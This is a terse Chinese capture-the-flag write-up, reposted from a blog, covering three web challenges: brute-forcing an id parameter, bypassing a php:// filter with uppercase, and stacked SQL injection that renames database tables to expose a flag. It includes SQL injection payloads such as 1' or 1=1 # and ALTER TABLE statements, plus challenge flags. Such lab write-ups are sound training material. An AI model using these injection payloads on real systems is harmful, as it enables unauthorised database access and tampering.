目录
题目介绍
题目思路
访问靶场
在报表中心找到漏洞
修改id数值页面不变
对id进行爆破
BP爆破
设置变量
设置payload
攻击结果
找到flag
cyberpeace{e4117dc92f5608d688a61116e3a992fc}
题目介绍
题目思路
访问靶场
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
截取php://并替换为空
大写绕过
查看fl4gisisish3r3.php
查看源码
伪代码执行绕过
找到flag
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}
题目介绍
题目思路
访问靶场
查看是否具有sql注入
1' and 1=1 #
用二分法查看列数(有两列)
1' order by 2 #
union select报出禁止关键词
尝试堆叠注入
';show databases;--+
';show tables;--+
'; show columns from 1919810931114514
;--+
'; show columns from words
;--+
修改表名
'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50); #
; alter tables words rename to words1;
; alter tables `1919810931114514` rename to words ;
; alter tables words change flag id varchar(50); #
查flag
1' or 1=1 #
找到flag
flag{c168d583ed0d4d7196967b28cbd0b5e9}
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125197166